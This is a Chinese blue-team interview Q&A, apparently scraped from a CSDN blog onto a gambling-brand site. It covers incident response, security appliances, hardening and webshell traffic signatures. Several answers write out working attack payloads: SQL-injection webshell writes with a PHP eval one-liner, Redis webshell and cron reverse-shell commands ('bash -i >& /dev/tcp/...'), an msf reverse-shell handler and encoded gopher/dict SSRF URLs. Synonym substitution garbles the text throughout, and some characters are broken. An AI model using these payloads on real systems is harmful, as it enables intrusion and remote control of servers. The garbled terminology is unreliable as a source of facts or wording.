2022年蓝队初级护网总结

宣布时间：2022-08-27

浏览次数：9549

一. 装备误报如那里置？？？

答：

来自外网的误报说明清静装备需要举行战略升级，，不需要处置惩罚。。。。。

若是是来自内网的误报可以和认真人协商一下看能不可解决，，有须要的话添加白名单处置惩罚。。。。。

二. 怎样区分扫描流量和手工流量？？？

答：

1.扫描流量数据量大，，请求流量有纪律可循且频率较高，，手工流量请求少，，距离略长

2.使用工具扫描的流量一样平常在数据包中有相关特征信息，，好比说通过wireshark网络封包剖析工具对流量举行一个详细的排查剖析，，好比通过http contains "xxx"来查找数据包中的要害字。。。。。

好比常用的误差扫描工具AWVS，，Nessus以及APPscan在请求的URL，，Headers, Body三项里随机包括了能代表自己的特征信息。。。。。

三. 网站被上传webshell如那里置？？？

答：

1.首先关闭网站，，下线效劳。。。。。有须要的话将效劳器断网隔离。。。。。

2.手工连系工具举行检测。。。。。

工具方面好比使用D盾webshellkill，，河马webshell查杀，，百度在线webshell查杀等工具对网站目录举行排查查杀，，若是是在护网时代可以将样本备份再举行查杀。。。。。

手工方面临比未上传webshell前的备份文件，，从文件甚至代码层面举行比照，，检查有无后门程序或者其他异常文件，，着实不可就直接用备份文件替换了。。。。。

4.增强清静战略，，好比按期备份网站设置文件，，实时装置效劳器补丁，，按期更新组件以及清静防护软件，，按期修改密码等等步伐。。。。。

四. 给你一个较量大的日志，，应该怎样剖析？？？

答：

攻击规则匹配通过正则匹配日志中的攻击请求

统计要领，，统计请求泛起次数，，次数少于同类请求平均次数则为异常请求

白名单模式，，为正常请求建设白名单，，不在名单规模内则为异常请求

HMM 模子，，类似于白名单，，差别点在于可对正常请求自动化建设模子，，从而通过正常模子找出不匹配者则为异常请求

使用日志剖析工具，，如LogForensics，，Graylog，，Nagios，，ELK Stack等等

五. 常见OA系统？？？

答：

PHP：通达OA、泛微 Eoffice

Java：泛微OA/云桥、致远OA、蓝凌OA、用友OA

ASP：启莱OA

六. 相识清静装备吗？？？

答：

入侵防御系统IPS

是盘算机网络清静设施，，是对防病毒软件和防火墙的增补。。。。。入侵预防系统是一部能够监视网络或网络装备的网络数据传输行为的盘算机网络清静装备，，能够即时的中止、调解或隔离一些不正�；；；；；蚴蔷哂形Ｏ招缘耐缡荽湫形�。。。。。

入侵检测系统IDS

起劲自动的防护步伐，，凭证一定的清静战略，，通过软件，，硬件对网络，，系统的运行举行实时的监控，，尽可能地发明网络攻击行为，，起劲自动的处置惩罚攻击，，包管网络资源的神秘性，，完整性和可用性。。。。。

防火墙

防火墙是位于两个(或多个)网络间，，实验网络间会见或控制的一组组件荟萃之硬件或软件。。。。。隔离网络，，制订出差别区域之间的会见控制战略来控制差别信任水平区域间传送的数据流。。。。。

数据库审计系统

是对数据库会见行为举行羁系的系统，，通过镜像或者探针的方法收罗所有数据库的会见流量，，并基于SQL语法，，语义的剖析手艺，，纪录下对数据库所有会见和操作行为，，例如会见数据的用户IP，，账号，，时间等等，，对数据举行操作的行为等等。。。。。

日志审计系统

日志审计系统能够通过主被动连系的手段，，实时且不中止的收罗用户网络中差别厂商的清静装备，，网络装备，，主机，，操作系统以及种种应用系统爆发的海量日志信息，，并将这些信息搜集到审计中心，，举行集中化存储，，备份，，盘问，，审计，，告警，，响应，，并出具富厚的报表报告，，获悉全网的整体清静运行态势，，同时知足等保关于清静治理中心的日志生涯时间大于6个月的要求。。。。。

堡垒机

是针对内部运维职员的运维清静审计系统。。。。。主要功效是对运维职员的运维操作举行审计和权限控制(好比要登录某些平台或者系统只能通过堡垒机才可以，，不必堡垒机是无法会见的)。。。。。同时堡垒机尚有账号集中治理，，单点登录(在堡垒机上登录即可实现对多个其他平台的无密登录)等功效。。。。。

误差扫描系统

误差扫描工具或者装备是基于误差数据库，，通过扫描等手段对指定的远程或外地盘算机系统的清静懦弱性举行检测，，发明可使用误差的一种清静检测系统(我们常用的针对WEB站点举行扫描的工具和此处误差扫描系统不是一个看法)。。。。。

数据清静态势感知平台

以大数据平台为基础，，通过网络多元，，异构的海量日志，，使用关联剖析，，机械学习，，威胁情报，，可视化等手艺，，资助用户一连监测网络清静态势，，实现从被动防御向起劲防御的进阶。。。。。

终端清静治理系统

是集防病毒，，终端清静管控，，终端准入，，终端审计，，外设管控，，EDR等功效于一体，，兼容差别操作系统和盘算机平台，，资助客户实现平台一体化，，功效一体化，，数据一体化的终端清静立体防护。。。。。

WAF

WAF是以网站或应用系统为焦点的清静产品，，通过对HTTP或HTTPS的Web攻击行为举行剖析并阻挡，，有用的降低网站清静危害。。。。。产品主要安排在网站效劳器的前方。。。。。通过特征提取和分块检索手艺举行模式匹配来抵达过滤，，剖析，，校验网络请求包的目的，，在包管正常网络应用功效的同时，，阻遏或者阻断无效或者不法的攻击请求。。。。。

蜜罐

蜜罐是一种清静威胁的自动防御手艺，，它通过模拟一个或多个易受攻击的主机或效劳来吸引攻击者，，捕获攻击流量与样本，，发明网络威胁，，提取威胁特征，，蜜罐的价值在于被探测，，攻陷。。。。。

七. 相识过系统加固吗？？？

答：

账户清静

windows

好比设置登录时不显示上次登录的用户名，，避免弱口令爆破。。。。。

设置账户锁定战略，，好比说登录行为限制次数，，抵达次数后锁定多长时间。。。。。

linux

禁用root之外的超等用户使用password -l <用户名>下令来锁定用户 -u解锁

限制通俗用户使用sudo提权，，或者说限制提权的权限巨细

锁定系统中多余的自建账号

设置账户锁定登录失败锁定次数，，锁准时间 faillog -u <用户名>下令来解锁用户

口令清静

windows

设置密码必需切合重大性要求，，好比设置时数字，，大写字母，，小写字母，，特殊字符都要具备

设置最小密码长度不可为0，，设置不可使用历史密码

linux

检查shadow中空口令账号，，修改口令重漂后，，设置密码有用期vim /etc/login.def下令

效劳与端口收敛

关闭或者限制常见的高危端口，，好比说22端口(SSH)，，23端口(Telnet)，，3389端口(RDP)

compmgmt.msc排查妄想使命

linux上iptables封禁IP或者限制端口

文件权限治理

linux上chmod修改文件权限 chattr主要文件设置不可修改权限

系统日志审计

linux上设置系统日志战略设置文件

系统日志 /var/log/message

cron日志/var/log/cron

清静日志/var/log/secure

装备和网络控制

好比在涉密盘算机上榨取会见外网，，为了阻止用户绕过战略可以榨取用户修改IP

删除默认路由设置，，阻止使用默认路由探测网络

榨取使用USB装备好比U盘

榨取ping下令，，即禁用ICMP协议会见，，不让外部ping通效劳器

八. 有没有清静装备的使用履历？？？

答：

态势感知或者说清静运营方面开源项目OSSIM。。。。。

IPS(入侵防御系统)方面Snort和清静洋葱Security Onion。。。。。

防火墙方面TinyWall和ClearOS，，或者说像火绒，，腾讯清静管家等一些通例的防护软件。。。。。

WAF（Web应用防火墙）方面ModSecurity和网站清静狗以及浮图。。。。。

威胁情报方面MISP和OpenCTI。。。。。

误差扫描方面OpenVAS，，针对web站点的误差扫描工具使用过AWVS，，Nessus

堡垒机方面JumpServer(linux系统装置，，但可以添加windows主机作为资产)。。。。。

蜜罐方面T-Pot(基于Linux系统装置)和微步的Hfish。。。。。

九. CS是什么工具，，知道怎么使用吗？？？

答：

简介

CobaltStrike是一款渗透测试工具，，被业界人称为CS。。。。。CobaltStrike分为客户端与效劳端，，效劳端是一个，，客户端可以有多个，，可用于团队漫衍式协同操作。。。。。

功效

CobaltStrike 集成了端口转发，，效劳扫描，，自动化溢出，，多模式端口监听，，windows exe 木马天生，，windows dll 木马天生，，java 木马天生，，office 宏病毒天生，，木马捆绑。。。。。垂纶攻击等功效。。。。。

使用

一样平常使用办法就是，，先启动效劳端，，然后启动客户端毗连获得一个可视化的界面，，新建监听器来吸收会话，，天生木马文件(常见.exe可执行文件，，office宏病毒，，html应用程序类型的后门文件)，，上传到受害者主机，，当受害者运行该木马文件时目的主机就在CS上线了。。。。。

十. WAF方面有没有相识过，，清晰WAF的分类和原理吗？？？

答：

分类：

WAF分为非嵌入型WAF和嵌入型WAF，，非嵌入型指的是硬WAF、云WAF、虚拟机WAF之类的；；；；；嵌入型指的是web容器模�？？槔嘈蚖AF、代码层WAF。。。。。

原理：

Web应用防火墙是通过执行一系列针对HTTP或者HTTPS的清静战略来专门为Web应用提供�；；；；；さ囊豢畈�。。。。。WAF对请求的内容举行规则匹配、行为剖析等识别出恶意行为，，并执行相关行动，，这些行动包括阻断、纪录、告警等。。。。。

十一. Powershell相识过吗？？？

答：

简介

PowerShell 是一种下令行外壳程序和剧本情形，，主要用于Windows盘算机利便治理员举行系统治理并有可能在未来取代Windows上的默认下令提醒符。。。。。PowerShell剧本因其优异的功效特征常用于正常的系统治理和清静设置事情。。。。。

使用

常见的操作 pwd ls cd mkdir rm

get-process获取所有历程信息

get-date获取目今时间信息

get-host获取目今主机信息

然后就是使用PowersSploit(基于Powershell的后渗透框架软件，，包括了许多Power shell攻击剧本，，主要用于渗透中的信息网络，，权限提升，，权限维持)的时间在Powshell上使用过一些下载和运行攻击剧本的下令。。。。。

十二. MSF是什么？？？知道怎么使用吗？？？

答：

简介：

Metasploit Framework(MSF)是一款开源清静误差检测工具，，附带数千个已知的软件误差，，并坚持一连更新。。。。。Metasploit可以用来信息网络、误差探测、误差使用等渗透测试的全流程。。。。。

模�？？椋�

Auxiliary（辅助模�？？椋�

为渗透测试信息搜集提供了大宗的辅助模�？？橹С�

Exploits（攻击模�？？椋�

使用发明的清静误差或设置弱点对远程目的系统举行攻击，，从而获得对远程目的系统会见权的代码组件。。。。。

Payload（攻击载荷模�？？椋�

攻击乐成后促使靶机运行的一段植入代码

Post （后渗透攻击模�？？椋�

网络更多信息或进一步会见被使用的目的系统

Encoders（编码模�？？椋�

将攻击载荷举行编码，，来绕过防护软件阻挡

使用：

首先使用Auxiliary辅助探测模�？？樯�，，嗅探，，指纹识别相关误差，，然后确认误差保存使用Exploit误差使用模�？？槎晕蟛罹傩惺褂�，，包括设置payload攻击载荷，，设置本机监听等等。。。。。误差使用乐成目的主机就会通过设置的端口自动毗连，，爆发会话。。。。。进而可以举行后渗透。。。。。

功效：

木马免杀，，抓取用户密码，，关闭杀毒软件，，屏幕截图，，新建账号，，远程登录，，迁徙历程，，提权操作，，网络嗅探，，端口转发，，内网署理，，内网扫描，，天生后门，，扫除日志等等。。。。。

十三. 使用过什么XSS平台吗？？？

答：

1.清华蓝莲花战队的BlueLotus。。。。。

2.xss-platform平台。。。。。

2.kali中的beef平台。。。。。

3.使用工具Postman。。。。。

十四. SQL注入怎么写入webshell？？？

答：

条件：

1、知道web绝对路径

2、有文件写入权限(一样平常情形只有ROOT用户有)

3、数据库开启了secure_file_priv设置

然后就能用select into outfile写入webshell

常见手法：

联合注入写入

?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into outfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#

dumpfile函数写入

?id=1' union select 1,"<?php @eval($_POST['shell']);?>",3 into dumpfile 'C:\\phpstudy\\WWW\\sqli\\shell.php'#

lines terminated by 写入

?id=1 into outfile 'C:/wamp64/www/shell.php' lines terminated by '<?php phpinfo()?>';

//lines terminated by 可以明确为以每行终止的位置添加 xx 内容。。。。。

lines starting by 写入

?id=1 into outfile 'C:/wamp64/www/shell.php' lines starting by '<?php phpinfo()?>';//使用 lines starting by 语句拼接webshell的内容。。。。。lines starting by 可以明确为以每行最先的位置添加 xx 内容。。。。。

fields terminated by 写入

?id=1 into outfile 'C:/wamp64/www/work/shell.php' fields terminated by '<?php phpinfo() ?>';//使用 fields terminated by 语句拼接webshell的内容。。。。。fields terminated by 可以明确为以每个字段的位置添加 xx 内容。。。。。

columns terminated by 写入

?id=1 into outfile 'C:/wamp64/www/shell.php' COLUMNS terminated by '<?php phpinfo() ?>';//使用 fields terminated by 语句拼接webshell的内容。。。。。fields terminated by 可以明确为以每个字段的位置添加 xx 内容。。。。。

sqlmap写入

写：(要写的文件，，必需在kali本机里有)写入到 /tmp 目录下 sqlmap -u "http://127.0.0.1/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details" -p 'username' --file-write="shell.php" --file-dest="/tmp/shell.php"

十五. 相识过反序列化误差吗？？？

答：

原理：

序列化是指程序将工具转化为字节序列从而便于存储运输的一种方法，，反序列化则与其相反，，即将字节序列转化为工具供程序使用。。。。。程序在举行反序列化时会挪用一些函数，，好比常见的PHP反序列化函数unserialize()以及一些常见的魔术要领，，好比结构函数_construct()，，析构函数_destruct()，，_wakeup()，，_toString()，，_sleep()等等。。。。。若是这些函数在转达参数时没有举行严酷的过滤步伐，，那么攻击者就可以结构恶意代码并将其序列化后传入函数中，，从而导致反序列化误差。。。。。

Java反序列化

Java反序列化就是将java工具转化为字节序列的历程。。。。。反序列化的历程就是

1，，建设一个工具输出流

2，，通过工具输出流的ReadObject()要领来读取工具

十六. 常见的框架误差？？？

答：

log4j远程代码执行误差

原理：

Log4j 是Apache 的一个开源项目，，是一款基于Java 的开源日志纪录工具。。。。。该误差主要是由于日志在打印时当遇到`${`后，，以:号作为支解，，将表达式内容支解成两部分，，前面一部分prefix，，后面部分作为key，，然后通过prefix去找对应的lookup，，通过对应的lookup实例挪用lookup要领，，最后将key作为参数带入执行，，引发远程代码执行误差。。。。。

详细操作：

在正常的log处置惩罚历程中对**${**这两个紧邻的字符做了检测，，一旦匹配到类似于表达式结构的字符串就会触发替换机制，，将表达式的内容替换为表达式剖析后的内容，，而不是表达式自己，，从而导致攻击者结构切合要求的表达式供系统执行

Fastjson反序列化误差

判断：

正常请求是get请求并且没有请求体，，可以通过结构过失的POST请求，，即可审查在返回包中是否有fastjson这个字符串来判断。。。。。

原理：

fastjson是阿里巴巴开发的一款将json字符串和java工具举行序列化和反序列化的开源json剖析库。。。。。fastjson提供了autotype功效，，在请求历程中，，我们可以在请求包中通过修改@type的值，，来反序列化为指定的类型，，而fastjson在反序列化历程中会设置和获取类中的属性，，若是类中保存恶意要领，，就会导致代码执行等这类问题。。。。。

无回显怎么办：

1.一种是直接将下令执行效果写入到静态资源文件里，，如html、js等，，然后通过http会见就可以直接看到效果

2.通过dnslog举行数据外带，，但若是无法执行dns请求就无法验证了

3.直接将下令执行效果回显到请求Poc的HTTP响应中

Shiro反序列化误差

原理：

Shiro是Apache下的一个开源Java清静框架，，执行身份认证，，授权，，密码和会话治理。。。。。shiro在用户登录时除了账号密码外还提供了可转达选项remember me。。。。。用户在登录时若是勾选了remember me选项，，那么在下一次登录时浏览器会携带cookie中的remember me字段提倡请求，，就不需要重新输入用户名和密码。。。。。

判断：

1.数据返回包中包括rememberMe=deleteMe字段。。。。。

2.直接发送原数据包，，返回的数据中不保存要害字可以通过在发送数据包的cookie中增添字段：****rememberMe=然后审查返回数据包中是否保存要害字。。。。。

shiro-550：

shiro反序列化误差使用有两个要害点，，首先是在shiro<1.2.4时，，AES加密的密钥Key被硬编码在代码里，，只要能获取到这个key就可以结构恶意数据让shiro识别为正常数据。。。。。另外就是shiro在验证rememberMe时使用了readObject要领，，readObject用来执行反序列化后需要执行的代码片断，，从而造成恶意下令可以被执行。。。。。攻击者结构恶意代码，，并且序列化，，AES加密，，base64编码后，，作为cookie的rememberMe字段发送。。。。。Shiro将rememberMe举行编码，，解密并且反序列化，，最终造成反序列化误差。。。。。

shiro-721：

不需要key，，使用Padding Oracle Attack结构出RememberMe字段后段的值连系正当的Remember。。。。。

十七.相识过redis数据库和常见的误差吗？？？

答：

redis是一个非关系型数据库，，使用的默认端口是6379。。。。。常见的误差是未授权会见误差，，攻击者无需认证就可以会见内部数据。。。。。使用手段主要有：

1.向root权限账户写入ssh公钥文件，，直接免密登录效劳器。。。。。(受害者redis非root权限运行会报错)

条件：

效劳器保存.ssh目录且具有写入的权限

原理：

在数据库中插入一条数据，，将本机的公钥作为value，，key值随意，，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys，，把缓冲的数据生涯在文件里，，这样就可以在效劳器端的/root/.ssh下天生一个授权的key。。。。。

2.写入webshell

条件：

已知web绝对路径。。。。。

办法：

1. redis -cli -h 192.168.x.x 毗连目的效劳器

2. config set dir "/var/www/html" 设置生涯文件路径

3. config set dbfilename shell.php 设置生涯文件名

4. set x "\n\n<?php @eval($_POST['cmd']); ?>\n" 将webshell写入x键值中

5. save 生涯

局限：

1.效劳器处于内网，，写入webshell后庄闲游戏公网IP无法毗连

2.效劳器IP地点不牢靠

3.6379端口不允许入偏向

4.上传webshell可能直接被杀毒软件删除

3.反弹毗连shell

设置监听端口，，常用的工具1.msf 2.netcat 3.socat使用msf设置监听办法：1. use exploit/multi/handler2. set payload generic/shell_reverse_tcp3. set lhost 192.168.x.x 默认监听端口为44444. run

4.准时使命反弹shell

办法：准时使命用的表达式：Cron表达式是一个字符串，，该字符串由6个空格分为7个域，，每一个域代表一个时间寄义。。。。。分时天月周 user-name(用户) command(下令) 好比每过一分钟向root用户的准时使命中写入反弹毗连下令(1) config set dir /var/spool/cron/ //目录切换到准时使命的文件夹中(2) config set dbfilename root //设置生涯文件名(3)set x "\n * * * * * bash -i >& /dev/tcp/192.168.96.222/7777 0>&1\n" //将反弹shell写入x键值中(4)save //生涯

使用准时使命反弹shell在目的系统是Centos上可用，，Ubuntu上有限制

理由如下：

1.默认redis写文件后是644的权限，，但ubuntu要求执行准时使命件/var/spool/cron/crontabs/权限必需是600也就是-rw-------才会执行，，不然会报错，，而Centos的准时使命文件权限644也能执行2.redis生涯RDB会保存乱码，，在Ubuntu上会报错，，而在Centos上不会报错3.两个系统的准时使命文件目录差别

使用主从复制getshell

条件：版本(4.x~5.0.5)原理：数据读写体量很大时，，为了减轻效劳器的压力，，redis提供了主从模式，，主从模式就是指定一个redis实例作为主机，，其余的作为从机，，其中主机和从机的数据是相同的，，而从机只认真读，，主机只认真写。。。。。通过读写疏散可以减轻效劳器端的压力。。。。。使用工具：RedisRogueServer地点：https://github.com/n0b0dyCN/redis-rogue-server使用工具的下令：python3 redis-rogue-server.py --rhost=x.x.x.x --lhost=x.x.x.x --exp=exp.so两种使用要领：交互式反弹式限制：使用这个要领getshell或者rce恣意导致redis效劳瘫痪，，一样平常不建议使用

redis未授权会见误差的提防步伐：

1.添加登录密码

2.修改默认端口

3.关闭端口

4.榨取以root用户权限启动，，以低权限启动redis效劳

十八. SSRF怎么连系Redis相关误差使用？？？

答：

主要通过两种协议，，dict协媾和gopher协议。。。。。

dict协议使用redis相关误差：

探测端口：

ssrf.php?url=dict://x.x.x.x:$端口$ 使用burpsuite爆破端口

探测是否设置弱口令：

ssrf.php?url=dict://x.x.x.x:6379/info 已知端口使用info探测是否设置了密码

爆破密码：

ssrf.php?url=dict://x.x.x.x:6379/auth:$密码$ 使用burpsuite爆破密码

写入webshell：

1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置生涯文件名3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e" //使用dict协议写入webshell 以上的字符编码是<?php phpinfo();?>的十六进制4. url=dict://x.x.x.x:6379/save 生涯

1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录

2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置生涯文件名

3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"

//使用dict协议写入webshell 以上的字符编码是<?php phpinfo();?>的十六进制

4.ssrf.php?url=dict://x.x.x.x:6379/save 生涯

dict协议使用妄想使命反弹shell或者写入ssh公钥的手段类似

gopher协议使用redis未授权会见误差写入webshell：

通例使用办法：

set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"

config set dir /var/www/html

config set dbfilename shell.php

save

两次url编码后结构url：

http://192.168.1.1/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

//第一次url解码和第二次url解码

//同理其他类似妄想使命反弹和写入ssh公钥等getshell方法相似

十九. windows应急响应时排查剖析的相关细节？？？

答：

可疑账号排查 lusrmgr.msc

1.检查效劳器是否有弱口令。。。。。好比空口令或者密码重漂后不敷。。。。。

2.高危端口是否对外开放，，好比SSH效劳22端口，，RDP效劳3389端口等。。。。。

3.审查效劳器是否有可疑账号。。。。。

手工方面：lusrmgr.msc下令审查用户和组，，审查是否有新增账号，，隐藏账号，，克隆账号。。。。。

工具方面：好比使用D盾等工具来检测隐藏账号。。。。。

4.连系日志剖析 eventvwr.msc 审查治理员登录时间，，相关事务是否有异常。。。。。

敏感事务ID：

4624 登录乐成

4625 登录失败

4672 使用超等治理员举行登录

4720 建设用户

5.使用query user审查目今系统的会话，，好比审查是否有人使用远程登录效劳器。。。。。

可疑历程和效劳排查 taskmgr services.msc

1.审查CPU，，内存，，网络等资源是否有可疑状态。。。。。好比CPU占用率过高可能是中了挖矿病毒，，磁盘空间大宗占用可能是剧本或病毒大宗天生和复制隐藏文件。。。。。

2.检查历程名

某些历程名是大宗随机的情形，，好比hrlC3.tmp、hrlD5.tmp、hrl6.tmp、hrlEE.tmp等多个名字相似的历程，，基本上可以断定是异常历程。。。。。

异常历程名伪装成系统历程或者说常见效劳的历程名，，此时可以通过历程形貌来判断，，并且需要手工比照。。。。。

3.检查历程和效劳形貌，，修改时间或者数字署名是否有异常。。。。。

4.使用工具举行检测，，好比Process Hunter或者火绒剑等专门针对历程效劳信息的排查剖析工具，，主要审查的是公司名，，形貌，，清静状态和启动类型等方面来排查。。。。。

可疑启动项排查 msconfig

1. msconfig或者使命治理器中的启动项审查名称，，宣布者和启动影响，，以及右键审查属性来看数字署名和修改时间。。。。。

2. 连系工具举行排查，，好比火绒剑等工具，，会将启动项分类为登录，，驱动程序，，妄想使命，，映像挟制等，，使用剖析排查

可疑文件排查

1.各个磁盘的Temp/tmp目录中是Windows爆发的暂时文件，，审查有无异常文件。。。。。

2.Recent目录会纪录最近翻开的文档以及程序的相关纪录。。。。。

3.审查文件的建设时间，，修改时间和会见时间，，好比说攻击者使用菜刀等工具对文件举行修改会改变修改时间，，若是修改时间在建设时间之前，，那就是很显着的可疑文件。。。。。

4.windows系统我的电脑快速会见，，可以看到最近使用的文件，，好比说图片或者压缩包等文件的使用历史和文件路径都会显示。。。。。

恶意样本排查

1.恶意样本指的一样平常是webshell，，病毒，，木马或者后门程序或文件，，可以凭证装备的告警信息来查找相关路径，，再排查相关的历程和启动项。。。。。

2.不知蹊径径的话可以使用相关的清静装备来举行检测，，好比说通过D盾，，河马查杀等工具对webshell可能保存的目录举行一个排查查杀，，使用通例的防火墙软件来对通盘或者可疑目录扫描病毒。。。。。

二十. 常见的webshell毗连工具流量？？？

答：

中国菜刀

毗连历程中使用base64编码对发送的指令举行加密，，其中两个要害payload z1 和 z2，，名字都是可变的。。。。。

然后尚有一段以QG开头，，7J最后的牢靠代码。。。。。

蚁剑

默认的user-agent请求头是antsword xxx，，不过可以修改。。。。。

一样平常将payload举行分段，，然后划分举行base64编码，，一样平常具有像eval这样的要害字，，然后呢或许率尚有@ini_set("display","0");这段代码。。。。。

冰蝎

php代码中可能保存eval，，assert等要害词，，jsp代码中可能会有getclass()，，getclassLoader()等字符特征。。。。。

冰蝎2.0

第一阶段请求中返回包的状态码是200，，返回内容是16位的密钥。。。。。建设毗连后的cookie名堂都是Cookie：PHPSessid=xxxx ；；；；；path=/；；；；；特征。。。。。

冰蝎3.0

请求包中的conten-length字段是5740或者5720，，然后请求头也具有特征信息，，不过这个较量长，，没有记着。。。。。

哥斯拉

1.jsp代码中可能会具有getclass，，getclassLoader等要害字，，payload使用base64编码等特征。。。。。php和asp则是通俗的一句话木马。。。。。

2.在响应包的cache-control字段中有no-store，，no-cache等特征。。。。。

3.所有请求中的cookie字段最后面都保存；；；；；特征

————————————————

作者：热爱画家夫人

原文链接：https://blog.csdn.net/zlloveyouforever/article/details/125174473

要害词标签：: 工具扫描 wireshark网络封包剖析工具

上一篇周全推进智慧公安建设，，庄闲游戏助力视频数据隔离交流两不误

下一篇数据清静配合体妄想 | 庄闲游戏谈下一代数据清静管控平台新生长

庄闲游戏

2022年蓝队初级护网总结

2022年蓝队初级护网总结

品牌动态

怎样购置

手艺支持

资源中心

相助同伴

快速链接